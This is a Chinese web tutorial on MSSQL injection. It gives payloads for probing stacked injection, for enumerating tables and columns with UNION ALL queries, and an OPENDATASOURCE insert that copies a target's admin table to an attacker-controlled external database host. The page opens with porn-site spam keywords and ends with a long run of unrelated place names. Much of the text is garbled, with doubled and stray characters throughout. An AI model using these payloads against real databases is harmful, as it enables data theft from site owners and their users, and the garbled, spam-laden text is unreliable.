最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

MSSQL反彈注入詳解

 更新時(shí)間:2025年02月13日 10:57:03   作者:Y22Lee  
文章主要介紹了MSSQL(微軟的SQL Server數(shù)據(jù)庫(kù)服務(wù)器)與MYSQL(MSSQL的簡(jiǎn)化版)的區(qū)別,以及MSSQL注入的基本原理和步驟,包括反彈注入和聯(lián)合查詢注入,感興趣的朋友一起看看吧

1.什么是MSSQL

MS SQL實(shí)際上是指微軟的SQL Server數(shù)據(jù)庫(kù)服務(wù)器,MYSQL可以說(shuō)是MSSQL的簡(jiǎn)化版。MYSQL數(shù)據(jù)庫(kù)一般專用于PHP網(wǎng)站,適合小,中型網(wǎng)站,而且還是開源的。 MSSQL目前大型網(wǎng)站使用,一般是商務(wù)網(wǎng)站使用,因?yàn)槭俏④涢_發(fā)的,所以要收費(fèi),而且要貴一些!
MSSQL與MYSQL的基本語(yǔ)法區(qū)別:(只針對(duì)滲透測(cè)試常用的語(yǔ)法)

MYSQL:
1.使用‘;'來(lái)作為語(yǔ)句的結(jié)尾
2.使用‘\'進(jìn)行轉(zhuǎn)義
3.系統(tǒng)自帶庫(kù):
mysql、information_schema、performance_schema、sys
4.查詢當(dāng)前數(shù)據(jù)庫(kù)名稱:database()
5.查看表名:tables
MSSQL:
1.‘;'是可選的,可寫可不寫,但是MSSQL中提供了go關(guān)鍵詞作為批處理語(yǔ)句的結(jié)尾
2.在SQL Server中則不需要轉(zhuǎn)義,有歧義的時(shí)候只需使用引號(hào)即可
3.系統(tǒng)自帶庫(kù):
Master、Model、Msdb、Tempdb
4.查詢當(dāng)前數(shù)據(jù)庫(kù)名稱:db_name()
5.查看表名:sysobjects

2.原理

讓目標(biāo)把得到的信息插入到滲透測(cè)試人員的數(shù)據(jù)庫(kù)中

3.MSSQL注入的條件

a.目標(biāo)要能訪問(wèn)外網(wǎng)
b.被插入的數(shù)據(jù)庫(kù)要能用公網(wǎng)IP連接

4.注入步驟

a.反彈注入

--1.搭建MSSQL環(huán)境
/*自己搭建一個(gè)MSSQL環(huán)境是不現(xiàn)實(shí)的,首先你得有公網(wǎng)IP,有了公網(wǎng)IP才能將查詢到的數(shù)據(jù)插入
到我們的數(shù)據(jù)庫(kù)中。這里可以免費(fèi)申請(qǐng)一個(gè)虛擬空間來(lái)幫我們搭建MSSQL環(huán)境,
比如:Alwaysdata,ProFreeHost,香港云等等。*/
--2.連接公網(wǎng)數(shù)據(jù)庫(kù)
--使用Navicat數(shù)據(jù)庫(kù)管理工具連接,連接名任意,主機(jī)為本機(jī)地址
--3.判斷是否存在堆疊注入
;select name from sysobjects waitfor delay ‘00:00:05:00'//如果網(wǎng)站發(fā)生延遲,說(shuō)明存在
--4.在連接的數(shù)據(jù)庫(kù)中創(chuàng)建一個(gè)新表用于存放數(shù)據(jù)
--5.反彈注入
--用opendatasource函數(shù)進(jìn)行反彈注入。
OPENDATASOURCE(provider_name,init_string)
/*provider_name為用于訪問(wèn)數(shù)據(jù)源的OLE DB 提供程序的PROGID的名稱
init_string為連接地址、端口、用戶名、密碼、數(shù)據(jù)庫(kù)名
server=連接地址,端口;uid=用戶名;pwd=密碼;database=數(shù)據(jù)庫(kù)名稱*/
--例如:
insert into opendatasource(‘sqloledb','server=den1.mssql8.gear.host,1433;uid=0;pwd=0;database=admin').admin.dbo.LYP select *from admin — qwe
/*insert into代表語(yǔ)句屬性,是插入語(yǔ)句
opendatasource(‘sqloledb','server=den1.mssql8.gear.host,1433;uid=0;pwd=0;database=admin').admin.dbo.LYP表示將查詢到的內(nèi)容插入到什么地方
select *from admin表示要查與數(shù)據(jù)的內(nèi)容
*/

b.MSSQL聯(lián)合查詢注入
<1.用常規(guī)SQL注入查字段數(shù)
<2.判斷顯錯(cuò)位
由于MSSQL語(yǔ)法比MYSQL嚴(yán)格些,所以不能直接全填數(shù)字來(lái)尋找顯錯(cuò)位,MYSQL中union只需要滿足字段數(shù)相同即可,但是MSSQL中如果你的填充位與數(shù)據(jù)庫(kù)字段類型不匹配是沒(méi)有數(shù)據(jù)顯示的!而且MSSQL的聯(lián)合查詢最好使用union all!不知道是什么類型時(shí)可以填‘null’

'union all select  'null','null','null' --s1

然后用數(shù)字逐個(gè)替換null判斷類型
到了這一步差不多可以猜出是MSSQL數(shù)據(jù)庫(kù),那么接下來(lái)的步驟就不能按照SQL注入的語(yǔ)法繼續(xù)查數(shù)據(jù)了
< 3.查表名
利用MSSQL自帶表獲取用戶自建表

'union all select id,name,'null' from sysobjects where xtype='U' --s2

<4.查字段名

'union all select 'null',name,'null' from dbo.syscolumns where id=··· ··· --s3

<5.查字段內(nèi)容

'union all select 字段名,字段名,字段名 from 表名 --q

5.補(bǔ)充

反彈注入是用來(lái)解決盲注,WAF攔截,訪問(wèn)過(guò)快被封
堆疊注入:
a.原理
在SQL中,分號(hào)(;)是用來(lái)表示一條sql語(yǔ)句的結(jié)束。試想一下我們?cè)?; 結(jié)束一個(gè)sql語(yǔ)句后繼續(xù)構(gòu)造下一條語(yǔ)句,會(huì)不會(huì)一起執(zhí)行?因此這個(gè)想法也就造就了堆疊注入。而union injection(聯(lián)合注入)也是將兩條語(yǔ)句合并在一起,兩者之間有什么區(qū)別么?區(qū)別就在于union 或者union all執(zhí)行的語(yǔ)句類型是有限的,可以用來(lái)執(zhí)行查詢語(yǔ)句,而堆疊注入可以執(zhí)行的是任意的語(yǔ)句。
b.局限性
<1.堆疊注入的局限性在于并不是每一個(gè)環(huán)境下都可以執(zhí)行,可能受到API或者數(shù)據(jù)庫(kù)引擎不支持的限制;
<2.堆疊查詢可以執(zhí)行任意的sql語(yǔ)句,但是這種注入方式并不是十分的完美的。在我們的web系統(tǒng)中,因?yàn)榇a通常只返回一個(gè)查詢結(jié)果,因此,堆疊注入第二個(gè)語(yǔ)句產(chǎn)生錯(cuò)誤或者結(jié)果只能被忽略,我們?cè)谇岸私缑媸菬o(wú)法看到返回結(jié)果的;
< 3. 在使用堆疊注入之前,我們也是需要知道一些數(shù)據(jù)庫(kù)相關(guān)信息的,例如表名,列名等信息。

到此這篇關(guān)于MSSQL反彈注入的文章就介紹到這了,更多相關(guān)MSSQL反彈注入內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • Sql根據(jù)不同條件統(tǒng)計(jì)總數(shù)的方法(count和sum)

    Sql根據(jù)不同條件統(tǒng)計(jì)總數(shù)的方法(count和sum)

    經(jīng)常會(huì)遇到根據(jù)不同的條件統(tǒng)計(jì)總數(shù)的問(wèn)題,一般有兩種寫法:count和sum都可以,下面通過(guò)實(shí)例代碼給大家分享Sql根據(jù)不同條件統(tǒng)計(jì)總數(shù),感興趣的朋友一起看看吧
    2024-08-08
  • SQL日志文件太大的處理辦法小結(jié)

    SQL日志文件太大的處理辦法小結(jié)

    本文主要介紹了SQL日志文件太大的處理辦法,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2025-04-04
  • sql語(yǔ)句LEFT?JOIN拼接表詳解

    sql語(yǔ)句LEFT?JOIN拼接表詳解

    這篇文章主要介紹了sql語(yǔ)句LEFT?JOIN拼接表詳解,需要的朋友可以參考下
    2023-05-05
  • sql中mod()函數(shù)取余數(shù)的用法

    sql中mod()函數(shù)取余數(shù)的用法

    Mod(a,b) 在sql中的意思是a/b的余數(shù),本文詳細(xì)的介紹了sql中mod()函數(shù)取余數(shù)的用法,感興趣的小伙伴們可以參考一下
    2021-05-05
  • SQL?CTE?(Common?Table?Expression)?高級(jí)用法與最佳實(shí)踐

    SQL?CTE?(Common?Table?Expression)?高級(jí)用法與最佳實(shí)踐

    CTE(Common?Table?Expression,公用表表達(dá)式)是SQL中的"命名臨時(shí)結(jié)果集",通過(guò)?WITH?關(guān)鍵字定義,僅在當(dāng)前查詢中生效,本文給大家介紹SQL?CTE?(Common?Table?Expression)?高級(jí)用法與最佳實(shí)踐,感興趣的朋友跟隨小編一起看看吧
    2025-10-10
  • 淺談為什么#{}可以防止SQL注入

    淺談為什么#{}可以防止SQL注入

    本文主要介紹了淺談為什么#{}可以防止SQL注入,#{} 匹配的是一個(gè)占位符,會(huì)對(duì)一些敏感字符進(jìn)行過(guò)濾,編譯過(guò)后會(huì)對(duì)傳遞的值加上雙引號(hào),因此可以防止 SQL 注入問(wèn)題,感興趣的可以來(lái)了解一下
    2022-05-05
  • sqlserver附加.mdf權(quán)限問(wèn)題解決

    sqlserver附加.mdf權(quán)限問(wèn)題解決

    sqlserver附加.mdf權(quán)限問(wèn)題解決,需要的朋友可以參考一下
    2013-03-03
  • SQL Server 數(shù)據(jù)庫(kù)索引其索引的小技巧

    SQL Server 數(shù)據(jù)庫(kù)索引其索引的小技巧

    關(guān)于索引的常識(shí):影響到數(shù)據(jù)庫(kù)性能的最大因素就是索引。由于該問(wèn)題的復(fù)雜性,我只可能簡(jiǎn)單的談?wù)勥@個(gè)問(wèn)題,不過(guò)關(guān)于這方面的問(wèn)題,目前有好幾本不錯(cuò)的書籍可供你參閱。我在這里只討論兩種SQL Server索引,即clustered索引和nonclustered索引
    2012-06-06
  • 使用SQL實(shí)現(xiàn)車流量的計(jì)算的示例代碼

    使用SQL實(shí)現(xiàn)車流量的計(jì)算的示例代碼

    本文主要介紹了使用SQL實(shí)現(xiàn)車流量的計(jì)算的示例代碼,文中通過(guò)示例代碼介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下
    2022-02-02
  • 淺談tempdb在SqlServer系統(tǒng)中的重要作用

    淺談tempdb在SqlServer系統(tǒng)中的重要作用

    tempdb是SQLServer的系統(tǒng)數(shù)據(jù)庫(kù)一直都是SQLServer的重要組成部分,用來(lái)存儲(chǔ)臨時(shí)對(duì)象。tempdb中的任何數(shù)據(jù)在系統(tǒng)重新啟動(dòng)之后都不會(huì)持久存在。因?yàn)閷?shí)際上每次SQLServer啟動(dòng)的時(shí)候都會(huì)重新創(chuàng)建tempdb。這個(gè)特性就說(shuō)明tempdb不需要恢復(fù)。
    2014-08-08

最新評(píng)論

宁陕县| 武陟县| 来安县| 和静县| 方城县| 南涧| 庄河市| 黄浦区| 武穴市| 东莞市| 绵竹市| 宾阳县| 漳浦县| 连江县| 龙江县| 桦甸市| 阿克陶县| 黎川县| 星子县| 四子王旗| 闵行区| 保定市| 筠连县| 江西省| 永和县| 剑阁县| 丹东市| 榆林市| 富阳市| 磴口县| 衡东县| 洛川县| 无为县| 南丹县| 扬中市| 平安县| 奉新县| 民勤县| 张家口市| 山东省| 仪陇县|